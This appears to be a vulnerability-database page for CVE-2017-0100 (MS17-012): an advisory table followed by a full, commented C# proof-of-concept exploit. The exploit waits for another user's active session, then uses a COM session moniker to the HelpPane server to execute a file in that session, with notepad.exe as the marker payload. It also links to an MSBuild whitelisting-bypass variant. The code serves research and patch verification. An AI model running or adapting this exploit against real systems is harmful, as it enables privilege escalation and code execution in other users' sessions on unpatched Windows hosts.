| Reporter | Title | Published | Views | Family All 27 |
|---|---|---|---|---|
| Microsoft Windows - COM Session Moniker Privilege Escalation (MS17-012) Exploit | 16 Mar 201700:00 | – | zdt | |
| Microsoft Windows COM Session Moniker Privilege Escalation Exploit | 14 Jul 201700:00 | – | zdt | |
| The vulnerability of the Windows operating system, which allows a hacker to increase their privileges | 31 Mar 201700:00 | – | bdu_fstec | |
| CVE-2017-0100 | 15 Mar 201700:00 | – | circl | |
| Microsoft Windows HelpPane Elevation of Privilege Vulnerability | 16 Mar 201700:00 | – | cnvd | |
| Microsoft Windows COM Elevation of Privilege (MS17-012: CVE-2017-0100) | 14 Mar 201700:00 | – | checkpoint_advisories | |
| CVE-2017-0100 | 17 Mar 201700:00 | – | cve | |
| CVE-2017-0100 | 17 Mar 201700:00 | – | cvelist | |
| March 2017 Security Only Quality Update for Windows 7 SP1 and Windows Server 2008 R2 SP1 | 14 Mar 201707:00 | – | mskb | |
| March 2017 Security Only Quality Update for Windows 8.1 and Windows Server 2012 R2 | 14 Mar 201707:00 | – | mskb |
/*
参考另外的 PoC:
COM Session Moniker EoP Exploit running within MSBuild.exe:
https://github.com/Cn33liz/MS17-012
Author and founder of the MSBuild Application Whitelisting Bypass code: Casey Smith, Twitter: @subTee More Info: http://subt0x10.blogspot.nl/2016/09/bypassing-application-whitelisting.html
Author and founder of the COM Session Moniker EoP Exploit: James Forshaw, Twitter: @tiraniddo More Info: https://bugs.chromium.org/p/project-zero/issues/detail?id=1021
*/
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Linq;
using System.Runtime.InteropServices;
using System.Threading;
namespace PoC_SessionMoniker_EoP
{
/// <summary>
/// Proof of concept for the COM session-moniker elevation of privilege tracked as
/// CVE-2017-0100 / MS17-012 ("HelpPane" EoP; see the advisory table above).
/// Flow: enumerate interactive sessions over wtsapi32, wait for one other than the
/// current session, then activate the HelpPane COM class inside that session through
/// a "session:N!new:CLSID" moniker and ask it to execute a file (notepad.exe here).
/// Defensive context: the March 2017 security-only updates listed above (mskb rows)
/// are the vendor fix; on patched hosts the cross-session activation is expected to fail
/// and the exception is printed by Main.
/// </summary>
class Program
{
    // ComImport interface: the declaration order of the methods defines the COM
    // vtable slots, so DisplayTask/DisplayContents/DisplaySearchResults/Execute must
    // stay in exactly this order. The GUID is the interface IID used for QueryInterface.
    [ComImport, Guid("8cec592c-07a1-11d9-b15e-000d56bfe6ee"), InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]
    interface IHxHelpPaneServer
    {
        void DisplayTask(string task);
        void DisplayContents(string contents);
        void DisplaySearchResults(string search);
        // The only method this PoC calls; Main passes a file:// URI (Uri.AbsoluteUri).
        void Execute([MarshalAs(UnmanagedType.LPWStr)] string file);
    }

    // Mirrors the native WTS_CONNECTSTATE_CLASS enumeration from wtsapi32.
    // Only WTSActive is consulted by GetSessionIds.
    enum WTS_CONNECTSTATE_CLASS
    {
        WTSActive, // User logged on to WinStation
        WTSConnected, // WinStation connected to client
        WTSConnectQuery, // In the process of connecting to client
        WTSShadow, // Shadowing another WinStation
        WTSDisconnected, // WinStation logged on without client
        WTSIdle, // Waiting for client to connect
        WTSListen, // WinStation is listening for connection
        WTSReset, // WinStation is being reset
        WTSDown, // WinStation is down due to error
        WTSInit, // WinStation in initialization
    }

    // Managed mirror of the native WTS_SESSION_INFO record returned (as an array) by
    // WTSEnumerateSessions; Sequential layout keeps the field order/size identical so
    // Marshal.PtrToStructure and Marshal.SizeOf can walk the native array.
    [StructLayout(LayoutKind.Sequential)]
    struct WTS_SESSION_INFO
    {
        public int SessionId;
        public IntPtr pWinStationName; // native string pointer, never read by this PoC
        public WTS_CONNECTSTATE_CLASS State;
    }

    // Enumerates terminal-services sessions. hServer == IntPtr.Zero means the local
    // machine (WTS_CURRENT_SERVER_HANDLE); Version must be 1. On success ppSessionInfo
    // points to a native array of pCount WTS_SESSION_INFO entries that the caller
    // must release with WTSFreeMemory.
    [DllImport("wtsapi32.dll", SetLastError = true)]
    static extern bool WTSEnumerateSessions(
        IntPtr hServer,
        int Reserved,
        int Version,
        out IntPtr ppSessionInfo,
        out int pCount);

    // Releases a buffer allocated by a wtsapi32 enumeration call.
    [DllImport("wtsapi32.dll", SetLastError = true)]
    static extern void WTSFreeMemory(IntPtr memory);

    /// <summary>
    /// Returns the IDs of all sessions in the WTSActive state, excluding session 0
    /// (the non-interactive services session).
    /// </summary>
    /// <returns>
    /// A materialized list of session IDs; empty when WTSEnumerateSessions fails or no
    /// active session qualifies. Enumeration failures are not surfaced (the bool
    /// return is used only to skip the loop; GetLastError is not consulted).
    /// </returns>
    public static IEnumerable<int> GetSessionIds()
    {
        List<int> sids = new List<int>();
        IntPtr pSessions = IntPtr.Zero;
        int dwSessionCount = 0;
        try
        {
            // Version 1 is the only value the API accepts; Reserved must be 0.
            if (WTSEnumerateSessions(IntPtr.Zero, 0, 1, out pSessions, out dwSessionCount))
            {
                IntPtr current = pSessions;
                for (int i = 0; i < dwSessionCount; ++i)
                {
                    // Copy the i-th native record into the managed struct.
                    WTS_SESSION_INFO session_info = (WTS_SESSION_INFO)Marshal.PtrToStructure(current, typeof(WTS_SESSION_INFO));
                    if (session_info.State == WTS_CONNECTSTATE_CLASS.WTSActive)
                    {
                        if (session_info.SessionId != 0)
                        {
                            sids.Add(session_info.SessionId);
                        }
                    }
                    // Advance by the marshalled size of one record to reach the next entry.
                    current += Marshal.SizeOf(typeof(WTS_SESSION_INFO));
                }
            }
        }
        finally
        {
            // The native array is owned by wtsapi32; free it even if marshalling threw.
            if (pSessions != IntPtr.Zero)
            {
                WTSFreeMemory(pSessions);
            }
        }
        return sids;
    }

    /// <summary>
    /// Entry point. Polls once per second until an active session other than the
    /// current one exists, waits a further 20 seconds, then binds a session moniker
    /// to the HelpPane class in that session and calls Execute with a file:// URI for
    /// %SystemRoot%\System32\notepad.exe. Any exception (including a failed moniker
    /// bind on a patched host) is written to the console and the process exits.
    /// </summary>
    /// <param name="args">Unused.</param>
    static void Main(string[] args)
    {
        try
        {
            int current_session_id = Process.GetCurrentProcess().SessionId;
            int new_session_id = 0;
            Console.WriteLine("Waiting For a Target Session");
            while (true)
            {
                // GetSessionIds returns a materialized list, so Count() and First()
                // below do not re-run the native enumeration.
                IEnumerable<int> sessions = GetSessionIds().Where(id => id != current_session_id);
                if (sessions.Count() > 0)
                {
                    new_session_id = sessions.First();
                    break;
                }
                Thread.Sleep(1000);
            }
            Console.WriteLine("Creating Process in Session {0} after 20secs", new_session_id);
            // Fixed delay before activation; presumably gives the target session time to
            // finish logging on — the PoC does not check readiness explicitly.
            Thread.Sleep(20000);
            // Composite moniker: "session:N" selects the target session, "new:CLSID"
            // activates the class there. Per the advisory titles above this is the
            // elevation step — the server runs in the other session's context, which
            // MS17-012 closes.
            IHxHelpPaneServer server = (IHxHelpPaneServer)Marshal.BindToMoniker(String.Format("session:{0}!new:8cec58ae-07a1-11d9-b15e-000d56bfe6ee", new_session_id));
            // Marker payload: notepad.exe from the System32 folder, passed as a file:// URI.
            Uri target = new Uri(Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.System), "notepad.exe"));
            server.Execute(target.AbsoluteUri);
        }
        catch (Exception ex)
        {
            // Catch-all: COM (COMException), P/Invoke and Uri errors all end up here
            // and are only printed; the exit code stays 0 either way.
            Console.WriteLine(ex);
        }
    }
}
}